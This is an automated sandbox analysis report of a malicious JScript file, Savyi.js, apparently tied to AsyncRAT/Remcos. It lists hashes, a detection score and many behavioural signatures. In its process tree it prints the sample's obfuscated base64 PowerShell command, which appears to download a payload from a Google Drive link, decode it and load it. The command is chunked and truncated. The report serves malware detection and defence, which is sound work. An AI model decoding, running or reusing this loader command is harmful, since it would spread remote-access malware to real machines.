Edit tour
Windows
Analysis Report
Savyi.js
Overview
General Information
| Sample name: | Savyi.js |
| Analysis ID: | 1546596 |
| MD5: | caf142ae86793cd64c2947889f57ce28 |
| SHA1: | 3c41375b1ee78c89b581b3d2a2aea42f895caab6 |
| SHA256: | ff6e5b04064c63dd80619d02c242c856bbf4e1f94ab230ca74817c3aa471ece4 |
| Tags: | asyncratjsRemcosRATuser-NDA0E |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
JavaScript file contains suspicious strings
JavaScript source code contains functionality to generate code involving a shell, file or stream
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 1480 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Savyi .js" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 2000 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' JgAoACAAJA BFAE4AVgA6 AEMATwBNAH MAUABlAGMA WwA0ACwAMQ A1ACwAMgA1 AF0ALQBKAG 8AaQBOACcA JwApACAAKA AgACgAKAAn ADgATwBaAG kAbQBhAGcA ZQBVAHIAbA AgAD0AIABO ADYASQBoAH QAdABwAHMA OgAvAC8AZA ByAGkAdgBl AC4AZwBvAG 8AZwBsAGUA LgBjAG8AbQ AvAHUAYwA/ AGUAeABwAG 8AcgB0AD0A ZABvAHcAbg BsAG8AYQBk ACYAaQBkAD 0AJwArACcA MQBBACcAKw AnAEkAVgBn AEoASgBKAH YAMQBGACcA KwAnADYAdg BTADQAcwBV AE8AeQBiAG 4ASAAtAHMA RAB2AFUAaA BCAFkAdwB1 AHIAIABOAD YASQA7ADgA TwBaAHcAZQ BiAEMAbABp AGUAbgB0AC AAPQAgAE4A ZQB3AC0ATw BiAGoAZQBj ACcAKwAnAH QAIABTAHkA cwB0AGUAbQ AuAE4AZQB0 AC4AVwBlAC cAKwAnAGIA QwBsAGkAZQ BuAHQAOwA4 AE8AWgBpAG 0AYQBnAGUA QgB5AHQAZQ BzACAAPQAg ADgATwBaAH cAZQBiAEMA bABpAGUAbg B0AC4ARABv AHcAbgBsAG 8AYQBkAEQA YQB0AGEAKA A4AE8AWgBp AG0AYQBnAC cAKwAnAGUA VQByAGwAKQ A7ADgATwBa AGkAbQBhAG cAZQBUAGUA eAB0ACAAPQ AgAFsAUwB5 AHMAdABlAG 0ALgBUAGUA eAB0AC4ARQ AnACsAJwBu ACcAKwAnAG MAbwBkAGkA bgBnAF0AOg A6AFUAVABG ADgALgBHAG UAdAAnACsA JwBTACcAKw AnAHQAcgBp ACcAKwAnAG 4AJwArACcA ZwAoADgATw BaAGkAbQBh AGcAZQBCAC cAKwAnAHkA dABlAHMAKQ A7ADgATwBa AHMAdABhAH IAdABGAGwA YQBnACAAPQ AgAE4ANgBJ ADwAPABCAE EAUwBFADYA NABfAFMAVA BBAFIAVAA+ AD4ATgA2AE kAOwAnACsA JwA4AE8AWg BlAG4AZABG AGwAJwArAC cAYQBnACAA PQAgAE4ANg BJADwAPABC AEEAUwBFAD YANABfAEUA TgBEAD4APg BOADYASQA7 ADgATwAnAC sAJwBaAHMA dABhACcAKw AnAHIAdABJ AG4AZABlAH gAIAA9ACAA OABPAFoAaQ BtAGEAZwBl AFQAZQB4AH QALgBJAG4A ZABlAHgATw BmACgAOABP AFoAcwB0AG EAcgB0AEYA bABhAGcAKQ A7ADgATwBa AGUAbgBkAE kAbgBkAGUA eAAgAD0AIA AnACsAJwA4 AE8AWgBpAG 0AYQBnAGUA VABlAHgAdA AuAEkAbgBk AGUAeABPAG YAKAA4AE8A WgBlAG4AZA BGAGwAYQBn ACkAOwA4AE 8AWgBzAHQA YQByAHQASQ BuAGQAZQB4 ACAALQBnAG UAIAAwACAA LQBhAG4AZA AgADgATwBa AGUAbgBkAE kAbgBkAGUA eAAgAC0AZw B0ACAAJwAr ACcAOAAnAC sAJwBPAFoA cwB0AGEAcg B0AEkAbgBk AGUAeAA7AD gATwBaAHMA dABhAHIAdA BJAG4AZABl AHgAIAArAD 0AJwArACcA IAA4AE8AWg BzAHQAYQBy AHQARgBsAG EAZwAuAEwA ZQBuAGcAdA BoADsAOABP AFoAYgBhAH MAZQA2ADQA TAAnACsAJw BlAG4AZwB0 AGgAIAA9AC AAJwArACcA OABPAFoAZQ BuAGQASQBu AGQAZQB4AC AALQAgADgA TwBaAHMAdA BhAHIAdABJ AG4AZABlAH gAJwArACcA OwA4AE8AWg BiAGEAcwBl ADYANABDAG 8AbQBtAGEA bgBkACAAPQ AgADgATwBa AGkAbQBhAG cAZQBUAGUA eAB0AC4AUw B1AGIAcwB0 ACcAKwAnAH IAaQBuAGcA KAA4AE8AWg BzAHQAYQBy AHQASQBuAG QAZQB4ACwA IAA4AE8AWg BiAGEAcwBl ADYANABMAG UAbgBnAHQA JwArACcAaA ApADsAOABP AFoAYgAnAC sAJwBhAHMA ZQA2ADQAUg BlAHYAZQBy AHMAZQBkAC AAPQAgAC0A agBvAGkAbg AgACgAOABP AFoAYgBhAH MAZQA2ADQA QwBvAG0AbQ BhAG4AZAAu AFQAbwBDAG gAYQByAEEA cgByAGEAeQ AoACkAIAAw AE4AUAAgAE YAbwByAEUA YQBjAGgALQ BPAGIAagBl AGMAdAAgAH sAIAA4AE8A WgBfACAAfQ ApAFsALQAx AC4ALgAtAC gAOABPAFoA YgBhAHMAZQ A2ADQAQwBv AG0AbQBhAG 4AZAAuACcA KwAnAEwAZQ BuAGcAdABo